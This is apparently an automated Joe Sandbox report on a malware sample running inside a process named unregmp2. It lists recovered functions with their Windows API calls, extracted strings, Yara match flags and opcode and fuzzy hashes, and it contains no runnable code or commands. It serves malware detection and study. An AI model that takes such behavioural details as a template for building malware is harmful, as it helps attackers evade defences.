Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b19739778b94435ba439c99014397ddff7457df6b0c6d4cc46ad6c90a7054ce4
Instruction ID: 683571568ab0a08d9129882481a7a03662b1cc2afce7d8bd2679b799ed322897
Opcode Fuzzy Hash: b19739778b94435ba439c99014397ddff7457df6b0c6d4cc46ad6c90a7054ce4
Instruction Fuzzy Hash: A8900221601400436140726888849064046FFE1325799C125A099A554D8959D9656665

Function 04572AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572ADA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97560e7476fffd282ababdf9c61a4b45e81a753ce12c3345aedaf2d754f54863
Instruction ID: 1f6c021c91a341d5f4acf45e91a9df6f64f670bc4092f7c050d8928fa2ae3220
Opcode Fuzzy Hash: 97560e7476fffd282ababdf9c61a4b45e81a753ce12c3345aedaf2d754f54863
Instruction Fuzzy Hash: 4D900225211400032105B65807445070087DBD5365399C025F1017554CDA21D9616121

Function 04572AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572AFA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c7023803101b7a7a63242717b035a524f26d6e3c252754e4285854388dadaf6
Instruction ID: 8771f092c091e966dfcea7c07c6720cb1fe74a0b4ac7c4d99e5ede7b3223c471
Opcode Fuzzy Hash: 6c7023803101b7a7a63242717b035a524f26d6e3c252754e4285854388dadaf6
Instruction Fuzzy Hash: 47900225221400032145B658064450B0486EBD63653D9C019F1417594CCA21D9656321

Function 04572B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572B6A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 156460d0fd81fdbf446ef20aea46b673b06880c871950b4cc2182ff27479f336
Instruction ID: 66d2bb2b4e9ab4b50a4e1d67a2df7b54a8af60a0fa923471647d5624e39219d2
Opcode Fuzzy Hash: 156460d0fd81fdbf446ef20aea46b673b06880c871950b4cc2182ff27479f336
Instruction Fuzzy Hash: 8190026120240003610572584454616404BDBE0315B99C025E1016594DC925D9917125

Function 04572BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572BFA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1360d79a01fb68d82a65cf77ec3734dec4a9921c2b0081f5d7125c908802e436
Instruction ID: d760749063b587046d7ef065493388ed6ba8880c861e73a6638fe906a484e09a
Opcode Fuzzy Hash: 1360d79a01fb68d82a65cf77ec3734dec4a9921c2b0081f5d7125c908802e436
Instruction Fuzzy Hash: 0690023120140803F1807258444464A0046DBD1315FD9C019A0027658DCE15DB5977A1

Function 04572BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572BEA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6d7635ff8946b119ac05c09f514b86561cce65284b32c2992aab78269e7bd6f
Instruction ID: 8ea5b44da6f31fa4a62c442f2da2ede783a1f07ee4620ca780ae83fa198dc969
Opcode Fuzzy Hash: c6d7635ff8946b119ac05c09f514b86561cce65284b32c2992aab78269e7bd6f
Instruction Fuzzy Hash: 7890023120544843F14072584444A460056DBD0319F99C015A0066698D9A25DE55B661

Function 04572BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572BAA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 158730f2129dce6070f5cc4b677c294b4003a6f6b764b79554f4a897c29a9d66
Instruction ID: 547681720759e27c429ca3f21dc0066b79cc6414364bc4a67c5a74ef8a7e0437
Opcode Fuzzy Hash: 158730f2129dce6070f5cc4b677c294b4003a6f6b764b79554f4a897c29a9d66
Instruction Fuzzy Hash: 1590023160540803F150725844547460046DBD0315F99C015A0026658D8B55DB5576A1

Function 045735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045735CA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6239720e08c70385925e25cb80aaac9ad3b1733d351b7f599584a95c81249ae
Instruction ID: 99436d4eceee96eaea36e4b204b82035d49dbbbcecea1a7809d0417445652dd6
Opcode Fuzzy Hash: d6239720e08c70385925e25cb80aaac9ad3b1733d351b7f599584a95c81249ae
Instruction Fuzzy Hash: 4190023160550403F100725845547061046DBD0315FA9C415A042656CD8B95DA5175A2

Function 045739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045739BA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3dd255dbd3d7efb2c9c36e61f6fe5035f948ae88cf224fb98f53a76923f39d56
Instruction ID: 7eb7534644ee5a1c58bfafe8d60c377f474ebbb9b27982911f3f03185b1ddc30
Opcode Fuzzy Hash: 3dd255dbd3d7efb2c9c36e61f6fe5035f948ae88cf224fb98f53a76923f39d56
Instruction Fuzzy Hash: 6A90022124545103F150725C44446164046FBE0315F99C025A0816598D8955D9557221

Function 004197A6 Relevance: 73.7, APIs: 1, Strings: 41, Instructions: 183
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419795

Strings

y, xrefs: 00419870
PT, xrefs: 00419A67
l!, xrefs: 004199A1
', xrefs: 00419AEF
:, xrefs: 0041987E
[, xrefs: 00419A90
H, xrefs: 00419C10
P, xrefs: 0041993E
q8, xrefs: 00419824
/, xrefs: 00419869
"X, xrefs: 00419A05
+`, xrefs: 004199AB
], xrefs: 004197FC
\U, xrefs: 00419948
d, xrefs: 00419934
{, xrefs: 00419806
c, xrefs: 00419BA5
'r, xrefs: 004198EA
#z, xrefs: 004198E0
E, xrefs: 00419ADA
2u, xrefs: 00419844
-Q, xrefs: 00419A52
J, xrefs: 00419A9A
!, xrefs: 00419AE8
<l, xrefs: 00419A60
xC, xrefs: 00419AFD
h, xrefs: 00419AB8
), xrefs: 00419905
gu, xrefs: 0041998D
H, xrefs: 00419B25
k, xrefs: 00419AF6
', xrefs: 004198AE
0, xrefs: 004198CC
cq, xrefs: 00419B57
|, xrefs: 00419C06
], xrefs: 00419B43
M-, xrefs: 00419983
S, xrefs: 00419B2F
6Z, xrefs: 004197CA
B?, xrefs: 0041995B
p, xrefs: 00419AC2

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: !$"X$#z$'$'r$)$+`$-Q$/$2u$6Z$:$<l$B?$E$H$H$J$M-$P$PT$S$[$\U$]$]$c$cq$d$gu$h$k$l!$p$q8$xC$y${$|$'$0
API String ID: 2422867632-1502332348
Opcode ID: ff602d26d9f6cf80c9d79c864edeb503f59450b53307c05347d260f823fcda33
Instruction ID: 2ba7444a3a7d04c9f7c6b502beacc034c150e8587a7175834f04b698d12d90fe
Opcode Fuzzy Hash: ff602d26d9f6cf80c9d79c864edeb503f59450b53307c05347d260f823fcda33
Instruction Fuzzy Hash: 91B158B0D05769DBEB618F41CD987DEBAB0BB05308F1081D9D15C3B281CBBA1A89CF95

Function 0042096E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7454168B, xrefs: 00420AAC, 00420AB6, 00420AC7
7454168B, xrefs: 00420ABE, 00420AC1

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID:
String ID: 7454168B$7454168B
API String ID: 0-2062695193
Opcode ID: eb29f3346ce0dfc0abc71e2db90ff159bc60dc48cf0b0c659f5e24b8758ec31c
Instruction ID: 93542cb91a5116b6517d9a118192c4de7a5a3318bf45407a35cc4cd6a1661bfe
Opcode Fuzzy Hash: eb29f3346ce0dfc0abc71e2db90ff159bc60dc48cf0b0c659f5e24b8758ec31c
Instruction Fuzzy Hash: 1A115BB6A0126C7AD702ABA09C82DEFB7ACDF91384F858065F900AB202C73D9D434795

Function 004209C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00420AB7

Strings

7454168B, xrefs: 00420AAC, 00420AB6, 00420AC7
7454168B, xrefs: 00420ABE, 00420AC1

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 7454168B$7454168B
API String ID: 1836367815-2062695193
Opcode ID: ca348407d5b1944811bfe4eadfca62e965c58c39670b4a0310f8f54c236a6000
Instruction ID: 1afc843144b8f6d100a73dcd7728687053d90456487174526ea4693dfc03d6e3
Opcode Fuzzy Hash: ca348407d5b1944811bfe4eadfca62e965c58c39670b4a0310f8f54c236a6000
Instruction Fuzzy Hash: 8A112FB2A412187BD7119BA09C81DFF77BCDF40398F858469F900B7141D6395E078BA5

Function 00420A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00420AB7

Strings

7454168B, xrefs: 00420AAC, 00420AB6, 00420AC7
7454168B, xrefs: 00420ABE, 00420AC1

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 7454168B$7454168B
API String ID: 1836367815-2062695193
Opcode ID: a8c304efd5c02d92ecfb49fb5b7ee7b242346f5fbdbb4abecb6768fee03ccac6
Instruction ID: 6c338cdc2fe603a53823765231f249aa963f3f7fee41c46e7d5f77298897db6b
Opcode Fuzzy Hash: a8c304efd5c02d92ecfb49fb5b7ee7b242346f5fbdbb4abecb6768fee03ccac6
Instruction Fuzzy Hash: A60108B1D0121C7AEB10ABD18C81DEFBB7CDF40798F458069FA04B7241D6785E068BA6

Function 00420A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00420AB7

Strings

7454168B, xrefs: 00420AAC, 00420AB6, 00420AC7
7454168B, xrefs: 00420ABE, 00420AC1

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 7454168B$7454168B
API String ID: 1836367815-2062695193
Opcode ID: b60be7116bc06f8b8b93d5cefc255e95bb917c2f1948d5dfb75a831db110d307
Instruction ID: dc4718e56a22451ec7ec45262d002bfe95455c09c3ebc50dee3b9d6b30a5d285
Opcode Fuzzy Hash: b60be7116bc06f8b8b93d5cefc255e95bb917c2f1948d5dfb75a831db110d307
Instruction Fuzzy Hash: 1801D6B1D0125C7ADB11ABE18C81DEFBB7CDF40798F458069FA04B7241D6785E068BB6

Function 004382F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00421659,?,[LC,00421659,00434657,00434C5B,?,00421659,00434657,00001000,?,?,00439BC0), ref: 0043832F

Strings

WFC, xrefs: 004382F4, 00438318
[LC, xrefs: 0043831E, 0043832A

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: WFC$[LC
API String ID: 1279760036-1105996468
Opcode ID: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
Instruction ID: 5a1a1998a1b84b716717fa11828d16b0461adddcda0ed65295055b896f692be8
Opcode Fuzzy Hash: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
Instruction Fuzzy Hash: 6FE06D716002047BDA14EF59EC45FDB37ACEFC9714F10400AFA18A7242D671B91087B8

Function 00432B40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00432C0B

Strings

net.dll, xrefs: 00432BD7, 00432C5A, 00432C32, 00432C3E, 00432C66
wininet.dll, xrefs: 00432BAE, 00432BBA

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 19a28b8466f8829b74efd31151b63adb97cc94ea97e461d3178ffe3d36e729e9
Instruction ID: a96ce3f6742ffeb63c1d5214139a9a7159b38483cc8f9d73c777ce221af21ede
Opcode Fuzzy Hash: 19a28b8466f8829b74efd31151b63adb97cc94ea97e461d3178ffe3d36e729e9
Instruction Fuzzy Hash: AA31B2B1600304BBD714DF64D881FEBBBA8BB8C704F00551EBA595B245D7B4BA44CBA8

Function 004383D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,|B,00000010,?,?,?,00000044,?,00000010,00427CE3,?,?,?), ref: 00438433

Strings

|B, xrefs: 0043841B, 00438426

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID: |B
API String ID: 2186235152-4285104858
Opcode ID: f5d22d67842d2450b27c3065ff42fba51732c5ca887623a77e2c9bf35b7c859c
Instruction ID: 10f631c52af60e55e15e7ef12af1ca32c6b352a26b72310137ae4dff1dd8b896
Opcode Fuzzy Hash: f5d22d67842d2450b27c3065ff42fba51732c5ca887623a77e2c9bf35b7c859c
Instruction Fuzzy Hash: FA01C0B2200108BBCB44DE89DC81EEB77ADAF8C724F408109BA09E3240D631F9518BA4

Function 00427B30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00421940,wmC,00434657,?), ref: 00427B63

Strings

WFC, xrefs: 00427B3E, 00427B51

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID: WFC
API String ID: 2340568224-3745782158
Opcode ID: dfc5498256f3f42d30417f06aff1b8dcaf75e4f5e2812cd8907967518924d2f9
Instruction ID: 4abac85f02099defcd504cdea0f40c81d3d0a3d1c4efc8f2207b294c9c2fce74
Opcode Fuzzy Hash: dfc5498256f3f42d30417f06aff1b8dcaf75e4f5e2812cd8907967518924d2f9
Instruction Fuzzy Hash: 02D05E717842043BF640A7A99C43F57328C4B04758F044079BA08E73C2EE69F610856D

Function 0042EBB0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0042EBC7

Strings

@J7<, xrefs: 0042EBDB

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 5ce6dcf617c5f06965163bde57df42a3b2a15ec3d3217ad3b8d92d4294f82889
Instruction ID: 9a8d50c82f8f3f10c7b9e04a2f057e8823b9c3fbac3bfde0b4ee37cb773d54d9
Opcode Fuzzy Hash: 5ce6dcf617c5f06965163bde57df42a3b2a15ec3d3217ad3b8d92d4294f82889
Instruction Fuzzy Hash: 0B312DB6A0020AAFDB00DFD9D8809EFB7B9BF88304F508559E515AB314D775EE058BA4

Function 00424410 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00424482

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
Instruction ID: a6e4002417becf625ee1bdeac3fd296eca571826891a8f8ee0c665d44eabe30a
Opcode Fuzzy Hash: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
Instruction Fuzzy Hash: C00152B5E0010DA7DF10EBE1EC42F9EB7789B54308F004199EA0897241F634EB14C795

Function 00419750 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419795

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 761c4c79b673f4af8e8a6f622ab2f12ea5dff2cd1a5a576294190b8fd4754503
Instruction ID: e51f365536630bf400371fb927baafee5c7eff0c6b0f4e05f6f5784c22b3628e
Opcode Fuzzy Hash: 761c4c79b673f4af8e8a6f622ab2f12ea5dff2cd1a5a576294190b8fd4754503
Instruction Fuzzy Hash: 9CF0307734021436E22166EA9C02FD7764CCB84B65F14042AF70CEA1C1D996B94186A8

Function 0041974B Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419795

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: eeaae81f0b582460093ea9faca58f56e322993ab709f0aeb9a730b36c156ee7b
Instruction ID: 63be31b84c68e5b2b6d050efa9d722fab3cd1d3b26bece3f67b8cef033781633
Opcode Fuzzy Hash: eeaae81f0b582460093ea9faca58f56e322993ab709f0aeb9a730b36c156ee7b
Instruction Fuzzy Hash: CEE0927225031077F62176959C02FD762888F44B14F14001BF719EB2C1CAA9B981429D

Function 00438340 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,08E2C10E,00000007,00000000,00000004,00000000,00423CE6,000000F4,?,?,?,?,?), ref: 0043837F

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
Instruction ID: 58f3a37670b8fbc86e80169d20048cb7800559da82d290d1a4e310f10e847f6e
Opcode Fuzzy Hash: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
Instruction Fuzzy Hash: 09E06D716046047BD614EE59DC41FDB33ACDFC9714F40400AF90DA7242CA71B81187B9

Function 00427D20 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00427D4C

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3808e0d5ce3175fb2009888138a180ee8ca0d458d53aa132950fd60b491c031d
Instruction ID: e2f32f38089c976577883205f26edabd4d70f2dd1726e92da8cbad818e0ccfa5
Opcode Fuzzy Hash: 3808e0d5ce3175fb2009888138a180ee8ca0d458d53aa132950fd60b491c031d
Instruction Fuzzy Hash: B1E0D83125420417E7247678AC81F7333484B48764F540551B81CDF2D1D57DF9018154

Function 004244A1 Relevance: 1.5, APIs: 1, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00424482

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
Instruction ID: 19018cc8097f4b9d667bbd5ef887f182e0d6bd6248c44eb9b530b9ec929252af
Opcode Fuzzy Hash: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
Instruction Fuzzy Hash: AAD02E7668D21A8FC700CB6CE857B88FBA4EB64304F4502CACC946B690C63062C28B26

Function 04572C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572C24

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eeb8a541af33054f066b48542c75a55b8b656a0c365a4dfcccfefcfeee4da87e
Instruction ID: 7e1352dc880dcdaab3537a5a5a488179a1a331e53a565a984f202aa1e2b290ca
Opcode Fuzzy Hash: eeb8a541af33054f066b48542c75a55b8b656a0c365a4dfcccfefcfeee4da87e
Instruction Fuzzy Hash: 8CB09B719015C5D6FB11F76056087177D45BBD0715F59C075E3031645E4738D1D1F175

Non-executed Functions

Function 0435B94A Relevance: 56.5, Strings: 45, Instructions: 218COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0435BA80
@@@@, xrefs: 0435BADB
89:;, xrefs: 0435B9D1
@@@@, xrefs: 0435BA6B
!"#$, xrefs: 0435BA2C
@@@@, xrefs: 0435BAFE
-./0, xrefs: 0435BA41
123@, xrefs: 0435BA48
@@@@, xrefs: 0435BAB8
@@@@, xrefs: 0435BA64
@@@?, xrefs: 0435B9C3
@@@@, xrefs: 0435BA72
@@@@, xrefs: 0435BAB1
@@@@, xrefs: 0435B9DF
@@@@, xrefs: 0435BB1A
@@@@, xrefs: 0435BB28
@@@@, xrefs: 0435BAA3
